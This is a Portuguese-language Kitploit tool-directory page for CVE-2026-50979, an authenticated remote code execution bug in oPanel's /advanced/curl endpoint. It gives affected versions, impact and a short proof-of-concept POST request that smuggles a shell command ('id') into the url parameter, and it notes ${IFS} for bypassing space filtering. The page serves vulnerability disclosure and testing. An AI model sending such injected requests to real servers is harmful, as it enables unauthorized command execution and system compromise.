Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-50979 — oPanel Execução Remota de Código Autenticada através do componente 'advenced/curl' | Kitploit
Ferramentas/GitHubGitHub/bugresearch/cve-2026-50979
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubbugresearch/cve-2026-50979

CVE-2026-50979

oPanel Execução Remota de Código Autenticada através do componente 'advenced/curl'

Ver Repositório
4há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-50979: Execução Remota de Código Autenticada no oPanel

Visão Geral

  • CVE ID: CVE-2026-50979
  • Produto: oPanel
  • Versões Afetadas: v1.19.50 e anteriores
  • Tipo de Vulnerabilidade: Injeção de Comandos Autenticada / Execução Remota de Código (RCE)
  • Componente Vulnerável: endpoint /advanced/curl
  • Gravidade: Crítica

Descrição

Existe uma vulnerabilidade de injeção de comandos no endpoint advanced/curl do oPanel (versões v1.19.50 e anteriores). A aplicação não sanitiza adequadamente a entrada fornecida pelo usuário no parâmetro url antes de passá-la para a rotina de execução subjacente do curl do sistema.

Um atacante autenticado pode contornar restrições básicas de espaço usando variáveis de shell (como ${IFS}) e injetar comandos arbitrários do sistema operacional (por exemplo, usando o operador ). Isso permite que o atacante execute código arbitrário no servidor subjacente com os privilégios da aplicação web.

;

Impacto

A exploração bem-sucedida permite que um usuário autenticado execute comandos arbitrários de shell no servidor que hospeda o oPanel. Isso pode levar ao comprometimento total do sistema, acesso não autorizado a dados e movimentação lateral adicional dentro da rede.

Prova de Conceito (PoC)

A vulnerabilidade é acionada ao enviar uma requisição HTTP POST maliciosa para o endpoint vulnerável após autenticação bem-sucedida.

Endpoint Vulnerável: POST /advanced/curl (normalmente acessado via porta 2083)

Estrutura do Payload Malicioso:

root@kitploit:~
POST /advanced/curl HTTP/1.1
Host: <target_ip>:2083
Content-Type: application/x-www-form-urlencoded
Cookie: <valid_authentication_cookies>

url=[http://example.com/;id](http://example.com/;id)
Baixar ferramenta